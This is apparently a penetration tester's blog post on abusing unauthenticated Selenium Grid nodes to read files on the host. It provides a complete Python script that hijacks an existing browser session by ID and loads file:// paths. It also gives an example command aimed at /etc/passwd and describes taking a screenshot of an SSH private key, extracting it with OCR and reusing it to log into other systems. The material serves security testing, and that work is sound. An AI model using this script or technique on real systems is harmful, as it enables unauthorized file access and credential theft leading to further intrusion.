Read Files with Selenium Grid Nodes

Jun 28, 2020
Selenium Grid
Utilizing Selenium Grid nodes to read local files from the browser.
Table of Contents

Selenium Grid

Recently on a pentest I had the chance to play around with Selenium Grid and its attached Nodes. Selenium Grid is a platform used for running browser tests in parallel and it is typically paired with Jenkins. Selenium Grid has nodes attached that can create browser sessions for these tests. This platform does not support authentication, therefore, if you find these platforms during a pentest, you can take advantage of their capabilities.

List Selenium Node Sessions

On the Selenium Grid host, you can list out all the Nodes attached to the Grid host and their respective browser sessions. Through the “/grid/api/sessions” endpoint, you can view these sessions. You can choose to reuse any of these sessions or create a new browser session. By reusing these sessions, you can take screenshots of folders or files as the respective user that is running the Selenium Node.

Reusing Selenium Node Browser Sessions

Through the web interface of any Selenium Node, you can create a browser session.
Creating a Session
Creating a Session
With an active SessionID, you can use the script below to reuse a browser session to visit or view any file on the local system. The script is also located in my GitHub repo.
import argparse
from selenium import webdriver

def create_driver_session(session_id, executor_url):
    from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver

    # Save the original function, so we can revert our patch
    org_command_execute = RemoteWebDriver.execute

    def new_command_execute(self, command, params=None):
        if command == "newSession":
            # Mock the response
            return {'success': 0, 'value': None, 'sessionId': session_id}

    # Patch the function before creating the driver object
    RemoteWebDriver.execute = new_command_execute

    new_driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})
    new_driver.session_id = session_id

    # Replace the patched function with original function
    RemoteWebDriver.execute = org_command_execute

    return new_driver

if __name__ == "__main__":
    Parser = argparse.ArgumentParser()
    Parser.add_argument('-u', '--url', help='Target URL')
    Parser.add_argument('-s', '--sessionid', help='Session ID from Selenium Hub session.')
    Parser.add_argument('-f', '--file', help='File to read')
    args = Parser.parse_args()

    if args.url is None:
        print('Specify a URL')

    if args.sessionid is None:
        print('Specify a Session ID')
        exit (1)

    if args.file is None:
        args.file = '/'

    grid_url = args.url
    sessionid = args.sessionid
    payload = args.file

    driver_chrome_reuse = create_driver_session(sessionid, grid_url)
    driver_chrome_reuse.get('file://' + payload)
Example usage of the script:
python3 -u 'http://localhost:4444/wd/hub' -s 872de14392f18a99a2298c4a1d732743 -f '/etc/passwd'
After you execute the script, visit the Node web interface and view the screenshot of the file. These sessions may be running as a privileged user so you may have access to important files. For example, you can take a screenshot of SSH private keys or configuration files with credentials. Below is a screenshot of the Selenium Node web interface after reading the “/” directory.
Reading “/” Directory
Reading “/” Directory


In my case, I took a screenshot of an SSH private key, used OCR to copy the text in the screenshot and reused the SSH key to authenticate to other systems. Luckily for me, the SSH key did not require a passphrase.
This is not something I routinely look for or frequently encounter on internal pentests, however, if you do encounter Selenium Grid it can be a potential attack path to a domain user if Responder or MiTM6 are not successful in your environment.
